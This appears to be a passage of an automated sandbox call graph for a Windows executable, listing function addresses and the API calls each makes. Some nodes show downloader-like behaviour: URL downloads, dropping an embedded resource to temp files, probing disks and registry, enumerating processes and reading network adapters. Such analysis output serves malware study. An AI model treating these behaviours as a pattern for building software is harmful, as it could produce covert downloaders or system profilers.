_memcpy_s 69 API calls 21703->21705 21704 d11307 __calloc_impl 7 API calls 21704->21708 21706 d0da2f 21705->21706 21706->21693 21706->21696 21707 d0da05 21709 d05d61 _memcpy_s 69 API calls 21707->21709 21708->21683 21708->21684 21708->21696 21708->21698 21708->21700 21708->21702 21708->21703 21708->21704 21708->21707 21710 d0f129 __VEC_memcpy VirtualFree VirtualFree HeapFree ___sbh_free_block 21708->21710 21715 d0d9da 21708->21715 21709->21699 21710->21708 21714 d0eed8 LeaveCriticalSection 21711->21714 21713 d11199 21713->21667 21713->21671 21714->21713 21718 d0eed8 LeaveCriticalSection 21715->21718 21717 d0d9e1 21717->21708 21718->21717 21720 cc6202 __EH_prolog3 21719->21720 21772 c97e83 21720->21772 21722 cc623d 21723 c9ccc5 73 API calls 21722->21723 21724 cc6248 std::_String_base::_Xlen 21723->21724 21724->21565 21726 cb8c37 __EH_prolog3 21725->21726 21834 cb800b 21726->21834 21728 cb8c45 std::_String_base::_Xlen 21728->21567 21730 cb6072 __EH_prolog3 21729->21730 21731 d0167f std::_String_base::_Xlen 77 API calls 21730->21731 21732 cb607e 21731->21732 21734 cb6092 std::_String_base::_Xlen 21732->21734 21840 cde234 21732->21840 21734->21569 21736 cb60c3 __EH_prolog3 21735->21736 21737 d0167f std::_String_base::_Xlen 77 API calls 21736->21737 21738 cb60cf 21737->21738 21739 cb60e3 std::_String_base::_Xlen 21738->21739 21918 cd50cc 21738->21918 21739->21571 21742 cb6114 __EH_prolog3 21741->21742 21774 c97e8f __EH_prolog3 21772->21774 21773 c97eba std::_String_base::_Xlen 21773->21722 21774->21773 21776 d010c4 21774->21776 21779 d01088 21776->21779 21778 d010d1 21778->21773 21780 d01094 __calloc_impl 21779->21780 21787 d033c3 21780->21787 21786 d010b5 __calloc_impl 21786->21778 21788 d0efca __lock 69 API calls 21787->21788 21789 d01099 21788->21789 21790 d00f9d 21789->21790 21791 d10a83 __decode_pointer 7 API calls 21790->21791 21792 d00fb1 21791->21792 21793 d10a83 __decode_pointer 7 API calls 21792->21793 21794 d00fc1 21793->21794 21795 d11124 __msize 70 API calls 21794->21795 21805 d01044 21794->21805 21796 d00fdf 21795->21796 21799 d01009 21796->21799 21800 d00ffa 21796->21800 21809 d0102b 21796->21809 21797 d10a08 __encode_pointer 7 API calls 21798 d01039 21797->21798 21802 d10a08 __encode_pointer 7 API calls 21798->21802 21801 d01003 21799->21801 21799->21805 21813 d0c4d7 21800->21813 21801->21799 21804 d0c4d7 __realloc_crt 75 API calls 21801->21804 21806 d0101f 21801->21806 21802->21805 21807 d01019 21804->21807 21810 d010be 21805->21810 21818 d10a08 TlsGetValue 21806->21818 21807->21805 21807->21806 21809->21797 21830 d033cc 21810->21830 21814 d0c4e0 21813->21814 21815 d0d896 _realloc 74 API calls 21814->21815 21816 d0c51f 21814->21816 21817 d0c500 Sleep 21814->21817 21815->21814 21816->21801 21817->21814 21819 d10a41 GetModuleHandleW 21818->21819 21820 d10a20 21818->21820 21821 d10a51 21819->21821 21822 d10a5c GetProcAddress 21819->21822 21820->21819 21823 d10a2a TlsGetValue 21820->21823 21824 d03327 __decode_pointer 2 API calls 21821->21824 21825 d10a39 21822->21825 21829 d10a35 21823->21829 21826 d10a57 21824->21826 21827 d10a74 21825->21827 21828 d10a6c RtlEncodePointer 21825->21828 21826->21822 21826->21827 21827->21809 21828->21827 21829->21819 21829->21825 21833 d0eed8 LeaveCriticalSection 21830->21833 21832 d010c3 21832->21786 21833->21832 21837 cb75f5 21834->21837 21838 c8d210 77 API calls 21837->21838 21839 cb7601 21838->21839 21839->21728 21841 cde240 __EH_prolog3 21840->21841 21888 cdd7e5 21841->21888 21889 cdd7f1 __EH_prolog3 21888->21889 21902 cdb367 21889->21902 21903 cdb373 __EH_prolog3 21902->21903 21904 cc61f6 80 API calls 21903->21904 21905 cdb37d 21904->21905 21908 cdb2d2 21905->21908 21909 cdb2de __EH_prolog3 21908->21909 21912 cdae04 21909->21912 21919 cd50d8 __EH_prolog3 21918->21919 21946 cd4ce1 21919->21946 21947 cd4ced __EH_prolog3 21946->21947 22330 cc6d05 22331 cc6d29 _memset __EH_prolog3 22330->22331 22364 cff5d0 22331->22364 22334 c9acf3 76 API calls 22335 cc6d7b 22334->22335 22376 cc6b21 22335->22376 22338 c9d261 98 API calls 22339 cc6da6 22338->22339 22340 cc6dc9 22339->22340 22341 c9ca59 73 API calls 22339->22341 22343 c9b6e5 77 API calls 22340->22343 22342 cc6dc0 22341->22342 22344 c9ca59 73 API calls 22342->22344 22345 cc6dd7 22343->22345 22344->22340 22346 c9ca59 73 API calls 22345->22346 22347 cc6de8 22346->22347 22348 c98323 72 API calls 22347->22348 22349 cc6df7 22348->22349 22350 c9ca59 73 API calls 22349->22350 22351 cc6e04 22350->22351 22352 c98323 72 API calls 22351->22352 22353 cc6e15 22352->22353 22389 cc6604 22353->22389 22356 c9820f ctype InterlockedDecrement 22357 cc6e26 22356->22357 22358 c9820f ctype InterlockedDecrement 22357->22358 22359 cc6e2e 22358->22359 22360 c9820f ctype InterlockedDecrement 22359->22360 22361 cc6e36 22360->22361 22362 d0071a _strlwr_s_l_stat 5 API calls 22361->22362 22363 cc6e51 22362->22363 22367 cff5f1 _memset 22364->22367 22375 cff67a 22364->22375 22365 d0071a _strlwr_s_l_stat 5 API calls 22366 cc6d62 22365->22366 22366->22334 22367->22375 22394 cff410 22367->22394 22369 cff627 _memset 22370 cff633 lstrlenA 22369->22370 22371 cff64e 22370->22371 22372 cff652 _strlwr_s_l_stat 22370->22372 22373 cc6919 79 API calls 22371->22373 22420 c8e480 22372->22420 22373->22375 22375->22365 22377 d006a0 _memset 22376->22377 22378 cc6b5a SHGetValueW 22377->22378 22379 cc6bca 22378->22379 22380 cc6b83 22378->22380 22381 d0071a _strlwr_s_l_stat 5 API calls 22379->22381 22380->22379 22382 cc6b90 22380->22382 22383 cc6bda 22381->22383 22384 c9b6e5 77 API calls 22382->22384 22383->22338 22385 cc6b9c PathCombineW PathFileExistsW 22384->22385 22386 cc6bbc 22385->22386 22387 c9820f ctype InterlockedDecrement 22386->22387 22388 cc6bc6 22387->22388 22388->22379 22725 cc62d3 SHGetValueW 22389->22725 22392 cc661e 22392->22356 22397 cff41a 22394->22397 22395 cff577 22396 d0071a _strlwr_s_l_stat 5 API calls 22395->22396 22398 cff587 22396->22398 22397->22395 22424 cff0d0 22397->22424 22398->22369 22400 cff44f _memset 22400->22395 22436 cff020 EnterCriticalSection 22400->22436 22402 cff479 22445 cfe360 22402->22445 22404 cff485 22407 cff4c5 22404->22407 22461 cfe570 22404->22461 22484 cfeb30 22407->22484 22409 cff4ab 22409->22407 22412 cff4b2 22409->22412 22411 cff4ec 22417 cff4ff 22411->22417 22541 cfed50 22411->22541 22528 cfe8b0 22412->22528 22505 cfe1a0 22417->22505 22421 c8e489 22420->22421 22422 c8e4b5 22420->22422 22421->22422 22423 c8e491 MultiByteToWideChar 22421->22423 22422->22371 22423->22371 22425 cff24d 22424->22425 22426 cff0f4 _memset 22424->22426 22427 d0071a _strlwr_s_l_stat 5 API calls 22425->22427 22426->22425 22429 cff121 SHGetValueA 22426->22429 22428 cff25e 22427->22428 22428->22400 22429->22425 22430 cff153 _memset 22429->22430 22430->22425 22431 cfe1a0 79 API calls 22430->22431 22432 cff20c lstrcmpiA 22431->22432 22432->22425 22433 cff226 22432->22433 22434 d0071a _strlwr_s_l_stat 5 API calls 22433->22434 22435 cff246 22434->22435 22435->22400 22437 cff059 22436->22437 22438 cff034 22436->22438 22557 cfeed0 22437->22557 22440 cff048 LeaveCriticalSection 22438->22440 22440->22402 22441 cff0b4 LeaveCriticalSection 22441->22402 22443 cff0ac 22443->22441 22444 cff099 LeaveCriticalSection 22444->22402 22446 cfe387 22445->22446 22447 cfe556 22445->22447 22446->22447 22456 cfe395 _memset 22446->22456 22448 d0071a _strlwr_s_l_stat 5 API calls 22447->22448 22449 cfe566 22448->22449 22449->22404 22450 c926b0 69 API calls 22451 cfe3c8 CreateFileA 22450->22451 22452 cfe3ef DeviceIoControl 22451->22452 22451->22456 22454 cfe432 CloseHandle 22452->22454 22452->22456 22453 cfe53a 22455 d0071a _strlwr_s_l_stat 5 API calls 22453->22455 22454->22456 22458 cfe54f 22455->22458 22456->22450 22456->22453 22457 cfe522 CloseHandle 22456->22457 22460 cfe51a 22456->22460 22580 d00610 DeviceIoControl 22456->22580 22457->22453 22457->22456 22458->22404 22460->22457 22469 cfe5b0 _memset _strncpy 22461->22469 22462 c926b0 69 API calls 22463 cfe5c8 CreateFileA 22462->22463 22463->22469 22464 cfe703 22465 d0071a _strlwr_s_l_stat 5 API calls 22464->22465 22466 cfe719 22465->22466 22466->22407 22470 cfe720 22466->22470 22467 cfe650 DeviceIoControl 22467->22469 22468 cfe6ea FindCloseChangeNotification 22468->22469 22469->22462 22469->22464 22469->22467 22469->22468 22471 cfe72a 22470->22471 22472 cfe88b 22471->22472 22482 cfe75b _memset 22471->22482 22473 d0071a _strlwr_s_l_stat 5 API calls 22472->22473 22474 cfe89c 22473->22474 22474->22409 22475 c926b0 69 API calls 22476 cfe785 CreateFileA 22475->22476 22476->22482 22477 cfe86e 22479 d0071a _strlwr_s_l_stat 5 API calls 22477->22479 22478 cfe7cf DeviceIoControl 22481 cfe857 FindCloseChangeNotification 22478->22481 22478->22482 22480 cfe884 22479->22480 22480->22409 22481->22477 22481->22482 22482->22475 22482->22477 22482->22478 22482->22481 22581 d00490 22482->22581 22485 cfeb58 _memset 22484->22485 22486 cfed31 22484->22486 22485->22486 22489 cfeb74 RegOpenKeyExA 22485->22489 22487 d0071a _strlwr_s_l_stat 5 API calls 22486->22487 22488 cfed42 22487->22488 22488->22411 22490 cfecf8 22489->22490 22491 cfeb98 RegEnumKeyExA 22489->22491 22490->22486 22492 cfecff 22490->22492 22493 cfeceb RegCloseKey 22491->22493 22494 cfebca 22491->22494 22498 d0071a _strlwr_s_l_stat 5 API calls 22492->22498 22493->22490 22495 cfebd0 RegOpenKeyExA 22494->22495 22496 cfecb9 RegEnumKeyExA 22495->22496 22497 cfebf4 RegQueryValueExA 22495->22497 22496->22495 22500 cfece7 22496->22500 22499 cfecae RegCloseKey 22497->22499 22504 cfec2c _memset 22497->22504 22501 cfed2a 22498->22501 22499->22496 22500->22493 22501->22411 22503 cfec60 lstrcmpA 22503->22499 22503->22504 22504->22499 22504->22503 22638 cfea20 22504->22638 22506 cfe1da _memset 22505->22506 22507 c926b0 69 API calls 22506->22507 22509 cfe1fe _memset _strncat 22507->22509 22508 c926b0 69 API calls 22508->22509 22509->22508 22511 cfe311 _memset 22509->22511 22510 d0071a _strlwr_s_l_stat 5 API calls 22512 cfe34f 22510->22512 22513 c926b0 69 API calls 22511->22513 22516 cfe33c 22511->22516 22512->22395 22517 cff270 22512->22517 22514 cfe336 22513->22514 22651 d0dc99 22514->22651 22516->22510 22518 cff297 _memset 22517->22518 22519 cfe1a0 79 API calls 22518->22519 22520 cff2a7 _memset 22519->22520 22521 cff31e SHSetValueA 22520->22521 22522 cff3bb SHSetValueA 22521->22522 22525 cff35a 22521->22525 22524 d0071a _strlwr_s_l_stat 5 API calls 22522->22524 22526 cff3fa 22524->22526 22525->22522 22527 cff39d SHSetValueA 22525->22527 22526->22395 22527->22522 22533 cfe8e0 22528->22533 22531 cfe923 DeviceIoControl 22531->22533 22532 cfea02 22534 d0071a _strlwr_s_l_stat 5 API calls 22532->22534 22533->22532 22535 d017ad _malloc 69 API calls 22533->22535 22701 cf6ceb 22533->22701 22536 cfea18 22534->22536 22537 cfe970 DeviceIoControl 22535->22537 22536->22407 22538 cfe9e1 CloseHandle 22537->22538 22540 cfe99d 22537->22540 22539 d0092b ___free_lconv_mon 69 API calls 22538->22539 22539->22533 22540->22538 22542 cfed7a _memset 22541->22542 22705 cfe000 22542->22705 22544 cfeead 22545 d0071a _strlwr_s_l_stat 5 API calls 22544->22545 22547 cfeebe 22545->22547 22546 cfed9b _memset 22546->22544 22548 cfe000 8 API calls 22546->22548 22547->22417 22549 cfedce _memset 22548->22549 22550 cfe000 8 API calls 22549->22550 22551 cfee3f 22550->22551 22551->22544 22552 cfee48 22551->22552 22553 c926b0 69 API calls 22552->22553 22554 cfee8b 22553->22554 22555 d0071a _strlwr_s_l_stat 5 API calls 22554->22555 22556 cfeea6 22555->22556 22556->22417 22562 cfef53 22557->22562 22558 cfefeb 22559 d0071a _strlwr_s_l_stat 5 API calls 22558->22559 22560 cff00d 22559->22560 22560->22441 22560->22443 22560->22444 22562->22558 22563 c926b0 22562->22563 22564 c926ba 22563->22564 22566 c926e8 22564->22566 22567 d039d7 22564->22567 22566->22558 22570 d03924 22567->22570 22569 d039ef 22569->22566 22571 d03954 22570->22571 22572 d03934 22570->22572 22575 d05d61 _memcpy_s 69 API calls 22571->22575 22579 d03949 22571->22579 22573 d05d61 _memcpy_s 69 API calls 22572->22573 22574 d03939 22573->22574 22576 d0653f _memcpy_s 7 API calls 22574->22576 22577 d03968 22575->22577 22576->22579 22578 d0653f _memcpy_s 7 API calls 22577->22578 22578->22579 22579->22569 22580->22456 22582 d00563 22581->22582 22584 d004a4 22581->22584 22582->22482 22584->22582 22588 d0053f 22584->22588 22589 d0df57 22584->22589 22593 d0a24d 22584->22593 22598 d0a3d6 22584->22598 22587 d0a3d6 79 API calls 22587->22588 22588->22582 22588->22587 22590 d0df75 22589->22590 22591 d0df65 22589->22591 22603 d0de42 22590->22603 22591->22584 22594 d0a25b 22593->22594 22595 d0a26d 22593->22595 22594->22584 22628 d0a1fc 22595->22628 22599 d0a3e4 22598->22599 22600 d0a3f8 22598->22600 22599->22584 22633 d0a380 22600->22633 22604 d00c48 _LocaleUpdate::_LocaleUpdate 79 API calls 22603->22604 22605 d0de57 22604->22605 22606 d0de63 22605->22606 22607 d0deb7 22605->22607 22613 d0de7b 22606->22613 22615 d2052d 22606->22615 22608 d0dedc 22607->22608 22609 d02f89 __isleadbyte_l 79 API calls 22607->22609 22610 d05d61 _memcpy_s 69 API calls 22608->22610 22612 d0dee2 22608->22612 22609->22608 22610->22612 22622 d0bf3e 22612->22622 22613->22591 22616 d00c48 _LocaleUpdate::_LocaleUpdate 79 API calls 22615->22616 22617 d20541 22616->22617 22618 d02f89 __isleadbyte_l 79 API calls 22617->22618 22621 d2054e 22617->22621 22619 d20576 22618->22619 22625 d13d69 22619->22625 22621->22613 22623 d00c48 _LocaleUpdate::_LocaleUpdate 79 API calls 22622->22623 22624 d0bf51 22623->22624 22624->22613 22626 d00c48 _LocaleUpdate::_LocaleUpdate 79 API calls 22625->22626 22627 d13d7c 22626->22627 22627->22621 22629 d00c48 _LocaleUpdate::_LocaleUpdate 79 API calls 22628->22629 22630 d0a20f 22629->22630 22631 d0a229 22630->22631 22632 d2052d __isctype_l 79 API calls 22630->22632 22631->22584 22632->22631 22634 d00c48 _LocaleUpdate::_LocaleUpdate 79 API calls 22633->22634 22635 d0a393 22634->22635 22636 d0a3b0 22635->22636 22637 d2052d __isctype_l 79 API calls 22635->22637 22636->22584 22637->22636 22639 c926b0 69 API calls 22638->22639 22640 cfea55 CreateFileA 22639->22640 22641 cfea7b 22640->22641 22642 cfea94 DeviceIoControl 22640->22642 22643 d0071a _strlwr_s_l_stat 5 API calls 22641->22643 22644 cfeb0c FindCloseChangeNotification 22642->22644 22645 cfeac7 22642->22645 22646 cfea8d 22643->22646 22647 d0071a _strlwr_s_l_stat 5 API calls 22644->22647 22645->22644 22648 c926b0 69 API calls 22645->22648 22646->22504 22649 cfeb25 22647->22649 22650 cfeb04 22648->22650 22649->22504 22650->22644 22652 d0dca9 22651->22652 22653 d0dcea 22651->22653 22655 d05d61 _memcpy_s 69 API calls 22652->22655 22656 d0dcc5 22652->22656 22659 d0dc34 22653->22659 22657 d0dcb5 22655->22657 22656->22516 22658 d0653f _memcpy_s 7 API calls 22657->22658 22658->22656 22660 d00c48 _LocaleUpdate::_LocaleUpdate 79 API calls 22659->22660 22661 d0dc47 22660->22661 22664 d0dab1 22661->22664 22665 d0daeb _strnlen 22664->22665 22666 d0dacf 22664->22666 22665->22666 22668 d0daff 22665->22668 22667 d05d61 _memcpy_s 69 API calls 22666->22667 22681 d0dad4 22667->22681 22670 d0bf3e ___crtLCMapStringA 79 API calls 22668->22670 22672 d0dae3 22668->22672 22669 d0653f _memcpy_s 7 API calls 22669->22672 22671 d0db42 22670->22671 22674 d0db65 22671->22674 22675 d0db4e 22671->22675 22673 d0071a _strlwr_s_l_stat 5 API calls 22672->22673 22677 d0dc32 22673->22677 22676 d0db6a 22674->22676 22685 d0db78 22674->22685 22678 d05d61 _memcpy_s 69 API calls 22675->22678 22679 d05d61 _memcpy_s 69 API calls 22676->22679 22677->22656 22680 d0db53 22678->22680 22679->22681 22682 d05d61 _memcpy_s 69 API calls 22680->22682 22681->22669 22682->22672 22683 d0dbd6 22684 d0dbc9 22688 d017ad _malloc 69 API calls 22685->22688 22690 d0db92 _strlwr_s_l_stat 22685->22690 22688->22690 22690->22683 22690->22684 22702 cf6cf5 22701->22702 22703 d039d7 _vswprintf_s 69 API calls 22702->22703 22704 cf6d22 CreateFileA 22702->22704 22703->22704 22704->22531 22704->22533 22706 cfe02d 22705->22706 22707 cfe00c 22705->22707 22706->22546 22711 cfdee0 22707->22711 22709 cfe016 22709->22706 22710 cfe01d GetProcAddress 22709->22710 22710->22706 22712 cfdf00 22711->22712 22714 cfdf18 _memset 22711->22714 22713 d0071a _strlwr_s_l_stat 5 API calls 22712->22713 22715 cfdf11 22713->22715 22716 cfdf2a GetSystemDirectoryW 22714->22716 22715->22709 22717 cfdf45 22716->22717 22718 cfdfe3 22716->22718 22717->22718 22721 cfdf6a 22717->22721 22719 d0071a _strlwr_s_l_stat 5 API calls 22718->22719 22720 cfdff5 22719->22720 22720->22709 22721->22721 22722 cfdfb0 LoadLibraryW 22721->22722 22723 d0071a _strlwr_s_l_stat 5 API calls 22722->22723 22724 cfdfdc 22723->22724 22724->22709 22726 cc630b 22725->22726 22726->22392 22727 cc658d 22726->22727 22728 cc659e 22727->22728 22733 cc659a 22727->22733 22729 cc65e4 22728->22729 22730 cc65a3 22728->22730 22745 cc6430 22729->22745 22732 d0167f std::_String_base::_Xlen 77 API calls 22730->22732 22735 cc65ad 22732->22735 22733->22392 22738 cc6508 22735->22738 22739 cc6545 22738->22739 22740 cc6540 22738->22740 22742 cc654c 22739->22742 22754 cc629b 22740->22754 22743 cc655c FindCloseChangeNotification 22742->22743 22744 cc6567 22742->22744 22743->22744 22744->22733 22746 cc6451 22745->22746 22751 cc646d 22745->22751 22748 cc645f URLDownloadToFileW 22746->22748 22750 cc647d _memset 22746->22750 22746->22751 22747 d0071a _strlwr_s_l_stat 5 API calls 22749 cc647b 22747->22749 22748->22751 22749->22733 22752 cc6498 URLDownloadToCacheFileW 22750->22752 22751->22747 22752->22751 22753 cc64b4 DeleteFileW 22752->22753 22753->22751 22755 cc62a8 22754->22755 22756 cc62a4 22754->22756 22755->22756 22757 d0a6b1 88 API calls 22755->22757 22756->22739 22758 cc62c2 22757->22758 22758->22739 22759 ca4f23 GetCurrentThreadId 22760 ca4f53 22759->22760 22762 ca4f3a 22759->22762 22760->22762 22765 ca2d6d 22760->22765 22767 ca2d82 22765->22767 22766 ca2d9f 22766->22762 22769 ca40c6 22766->22769 22767->22766 22772 ca2088 22767->22772 22770 ca40d4 TlsGetValue 22769->22770 22771 ca40d0 22769->22771 22770->22771 22771->22762 22774 ca2096 std::_String_base::_Xlen 22772->22774 22773 ca2103 ctype 22773->22766 22774->22773 22775 ca2141 22774->22775 22777 ca20e3 22774->22777 22776 d00729 __CxxThrowException@8 RaiseException 22775->22776 22778 ca2156 22776->22778 22779 d03dc0 _memmove_s __VEC_memcpy 22777->22779 22784 c9dd28 22778->22784 22781 ca20f3 22779->22781 22783 d03dc0 _memmove_s __VEC_memcpy 22781->22783 22782 ca216b 22782->22766 22783->22773 22785 c9dd36 std::_String_base::_Xlen 22784->22785 22789 c9dd69 _strncpy ctype 22784->22789 22786 c9dd5d 22785->22786 22787 d00729 __CxxThrowException@8 RaiseException 22785->22787 22786->22789 22790 c9dcfc 22786->22790 22787->22786 22789->22782 22791 c9dd0a _strlen 22790->22791 22792 c9dd26 22791->22792 22793 d00729 __CxxThrowException@8 RaiseException 22791->22793 22792->22789 22793->22792 22794 d10a7a 22795 d10a08 __encode_pointer 7 API calls 22794->22795 22796 d10a81 22795->22796 22797 cec13e CreateToolhelp32Snapshot 22798 cec16d Process32FirstW 22797->22798 22799 cec169 22797->22799 22800 cec188 CloseHandle 22798->22800 22801 cec191 22798->22801 22802 d0071a _strlwr_s_l_stat 5 API calls 22799->22802 22800->22799 22803 cec19c Process32NextW 22801->22803 22806 cec1ad CloseHandle 22801->22806 22805 cec1d1 22802->22805 22803->22801 22803->22806 22806->22799 22807 ceab1f CreateMutexW 22808 ceab3c GetLastError 22807->22808 22809 ceab88 22807->22809 22810 ceab69 EnterCriticalSection 22808->22810 22811 ceab49 CloseHandle FindWindowW 22808->22811 22814 cea9fb 22810->22814 22811->22809 22813 ceab80 LeaveCriticalSection 22813->22809 22815 ceaa0c 22814->22815 22818 ceaa18 22815->22818 22820 cea0e8 22815->22820 22818->22813 22821 cea0fc 22820->22821 22822 d06565 7 API calls 22821->22822 22823 cea10b 22821->22823 22822->22823 22824 cea856 22823->22824 22825 cea873 22824->22825 22832 cea86f 22824->22832 22826 cea0e8 7 API calls 22825->22826 22827 cea87d 22826->22827 22836 ce9c1f 22827->22836 22830 cea89d 22831 cea0e8 7 API calls 22830->22831 22833 cea8a9 22831->22833 22840 cea4ad 22832->22840 22858 cea0bb 22833->22858 22837 ce9c2d 22836->22837 22838 ce9c36 22837->22838 22839 d06565 7 API calls 22837->22839 22838->22832 22839->22838 22843 cea4ba 22840->22843 22841 cea55f ctype 22841->22830 22842 cea4e9 22845 cea58e 22842->22845 22850 cea4f4 22842->22850 22843->22841 22843->22842 22861 cea3eb 22843->22861 22846 cea59c 22845->22846 22847 cea5eb 22845->22847 22848 cea29c ctype 69 API calls 22846->22848 22849 cea29c ctype 69 API calls 22847->22849 22848->22841 22851 cea605 22849->22851 22879 ce9d10 22850->22879 22892 ce9fa9 22851->22892 22854 cea51b 22889 cea29c 22854->22889 22857 cea29c ctype 69 API calls 22857->22841 22909 ce9c7b 22858->22909 22862 cea3f7 __EH_prolog3 22861->22862 22863 c8b780 std::_String_base::_Xlen 77 API calls 22862->22863 22864 cea404 22863->22864 22865 c8a510 std::_String_base::_Xlen 77 API calls 22864->22865 22866 cea414 22865->22866 22867 d00729 __CxxThrowException@8 RaiseException 22866->22867 22868 cea429 __EH_prolog3 22867->22868 22869 c8b780 std::_String_base::_Xlen 77 API calls 22868->22869 22870 cea443 22869->22870 22871 c8a510 std::_String_base::_Xlen 77 API calls 22870->22871 22872 cea453 22871->22872 22873 d00729 __CxxThrowException@8 RaiseException 22872->22873 22874 cea468 22873->22874 22875 cea480 22874->22875 22876 cea491 22874->22876 22877 cea3eb std::_String_base::_Xlen 77 API calls 22874->22877 22875->22842 22878 ce9d10 std::_String_base::_Xlen 77 API calls 22876->22878 22877->22876 22878->22875 22880 ce9d2d 22879->22880 22881 ce9d1d 22879->22881 22880->22881 22882 ce9d39 22880->22882 22884 d0167f std::_String_base::_Xlen 77 API calls 22881->22884 22883 d06117 std::exception::exception 69 API calls 22882->22883 22885 ce9d49 22883->22885 22886 ce9d2a 22884->22886 22887 d00729 __CxxThrowException@8 RaiseException 22885->22887 22886->22854 22888 ce9d5e 22887->22888 22888->22854 22895 ce9e59 22889->22895 22902 ce9db6 22892->22902 22898 ce9a91 22895->22898 22899 ce9ab9 22898->22899 22900 ce9aad 22898->22900 22899->22857 22901 d008ce _memmove_s 69 API calls 22900->22901 22901->22899 22905 ce99de 22902->22905 22906 ce9a05 22905->22906 22907 ce99f9 22905->22907 22906->22841 22908 d008ce _memmove_s 69 API calls 22907->22908 22908->22906 22910 ce9c85 22909->22910 22912 ce9c8a 22909->22912 22911 d06565 7 API calls 22910->22911 22911->22912 22913 d06565 7 API calls 22912->22913 22914 ce9cbb 22912->22914 22913->22914 22914->22818 22915 c9c15b 22916 c9c167 __EH_prolog3 22915->22916 22925 ceeedc 22916->22925 22921 c9c190 std::_String_base::_Xlen 22922 c9c1ae 22956 cef4d0 22922->22956 22926 ceeee9 22925->22926 23000 ceed40 22926->23000 22929 cef3a8 22930 cef3cc __EH_prolog3 22929->22930 23006 ce94b9 22930->23006 22933 cef420 DeleteFileW 23018 ceef14 DeleteFileW CreateFileW 22933->23018 22934 cef3f1 22935 c9820f ctype InterlockedDecrement 22934->22935 22955 cef3f9 22935->22955 22938 cef438 _memset 22941 cef454 GetTempPathW 22938->22941 22939 d0071a _strlwr_s_l_stat 5 API calls 22940 c9c1aa 22939->22940 22940->22921 22940->22922 22942 c9accc std::_String_base::_Xlen 73 API calls 22941->22942 22943 cef472 22942->22943 22944 c9ca59 73 API calls 22943->22944 22945 cef47f 22944->22945 23023 cef1c5 22945->23023 22948 cef49d 22949 cef4a3 22948->22949 22950 c9ccc5 73 API calls 22948->22950 22951 c9820f ctype InterlockedDecrement 22949->22951 22952 cef4c8 DeleteFileW 22950->22952 22953 cef4ad 22951->22953 22952->22949 22954 c9820f ctype InterlockedDecrement 22953->22954 22954->22955 22955->22939 22957 cef4e2 _memset 22956->22957 22958 cef547 SHGetSpecialFolderPathW 22957->22958 22959 cef55c 22958->22959 22964 cef583 _wcscat 22958->22964 22960 d0071a _strlwr_s_l_stat 5 API calls 22959->22960 22962 c9c1b7 22960->22962 22961 cc1003 6 API calls 22963 cef596 PathCombineW 22961->22963 22962->22921 22963->22964 22964->22961 22965 cef5c1 PathFileExistsW 22964->22965 22966 cef5da 22964->22966 22965->22964 22965->22966 22967 ceef14 10 API calls 22966->22967 22968 cef5e9 22967->22968 22968->22959 22969 c9accc std::_String_base::_Xlen 73 API calls 22968->22969 22970 cef608 22969->22970 22971 c9ca59 73 API calls 22970->22971 22972 cef615 22971->22972 22973 cef1c5 94 API calls 22972->22973 22974 cef620 SHCreateDirectory 22973->22974 22975 cef639 22974->22975 22976 cef63f 22975->22976 22978 c9ccc5 73 API calls 22975->22978 22977 c9820f ctype InterlockedDecrement 22976->22977 22977->22959 22979 cef659 DeleteFileW 22978->22979 22980 c9b7f5 72 API calls 22979->22980 22981 cef678 MoveFileExW 22980->22981 22982 c9820f ctype InterlockedDecrement 22981->22982 22983 cef68f 22982->22983 22984 c9b7f5 72 API calls 22983->22984 22985 cef6a1 MoveFileExW 22984->22985 22986 c9820f ctype InterlockedDecrement 22985->22986 22987 cef6af 22986->22987 22988 c9b7f5 72 API calls 22987->22988 23001 d006a0 _memset 23000->23001 23002 ceed52 FindResourceW 23001->23002 23003 ceed6a SizeofResource LoadResource 23002->23003 23004 c9c189 23002->23004 23003->23004 23005 ceed85 LockResource 23003->23005 23004->22921 23004->22929 23005->23004 23007 ce94c6 _memset 23006->23007 23008 ce94f9 GetTempPathW 23007->23008 23011 ce9520 _memset _wcscat 23008->23011 23009 cc1003 6 API calls 23010 ce9534 PathCombineW 23009->23010 23010->23011 23011->23009 23012 ce9562 PathFileExistsW 23011->23012 23014 ce957b 23011->23014 23012->23011 23013 ce958c 23012->23013 23015 c9accc std::_String_base::_Xlen 73 API calls 23013->23015 23016 d0071a _strlwr_s_l_stat 5 API calls 23014->23016 23015->23014 23017 ce958a 23016->23017 23017->22933 23017->22934 23019 ceef4a 23018->23019 23020 ceef46 23018->23020 23047 ceebfc 23019->23047 23020->22934 23020->22938 23024 cef1e9 __EH_prolog3 23023->23024 23025 cef1ff PathFileExistsW 23024->23025 23026 cef381 23024->23026 23025->23026 23027 cef20e _memset 23025->23027 23028 d0071a _strlwr_s_l_stat 5 API calls 23026->23028 23030 cc6919 79 API calls 23027->23030 23029 cef39e SHCreateDirectory 23028->23029 23029->22948 23031 cef259 23030->23031 23032 cdcf38 76 API calls 23031->23032 23042 cef26b _memset 23032->23042 23033 cef362 23034 cdc813 FindClose 23033->23034 23035 cef36d RemoveDirectoryW 23034->23035 23037 cdc813 FindClose 23035->23037 23036 cdc7ec FindNextFileW 23036->23042 23038 cef37c 23037->23038 23038->23026 23039 cde1f1 73 API calls 23039->23042 23040 c99832 72 API calls 23040->23042 23041 c9820f ctype InterlockedDecrement 23041->23042 23042->23033 23042->23036 23042->23039 23042->23040 23042->23041 23043 cc6919 79 API calls 23042->23043 23044 cc6919 79 API calls 23042->23044 23046 cef1c5 91 API calls 23042->23046 23043->23042 23045 cef348 DeleteFileW 23044->23045 23045->23042 23046->23042 23053 ceec0e _memcpy_s 23047->23053 23048 d0071a _strlwr_s_l_stat 5 API calls 23049 ceed17 FindCloseChangeNotification 23048->23049 23049->23020 23050 ceecc8 _memcpy_s 23052 ceecd9 WriteFile 23050->23052 23054 ceecf4 23050->23054 23051 ceec96 WriteFile 23051->23053 23051->23054 23052->23054 23053->23050 23053->23051 23053->23054 23054->23048 23055 ce7add InternetGetConnectedState 23056 ce7af1 23055->23056 23057 ce7af7 23056->23057 23060 ce7a6a 23056->23060 23061 d017ad _malloc 69 API calls 23060->23061 23062 ce7a80 23061->23062 23063 ce7ad6 23062->23063 23064 ce7a87 GetAdaptersInfo 23062->23064 23065 ce7a96 23064->23065 23070 ce7ab6 23064->23070 23066 d0092b ___free_lconv_mon 69 API calls 23065->23066 23067 ce7a9c 23066->23067 23069 d017ad _malloc 69 API calls 23067->23069 23068 d0092b ___free_lconv_mon 69 API calls 23068->23063 23071 ce7aa4 23069->23071 23070->23068 23071->23070 23072 ce7aac GetAdaptersInfo 23071->23072 23072->23070 23073 d02aa7 23074 d02ab3 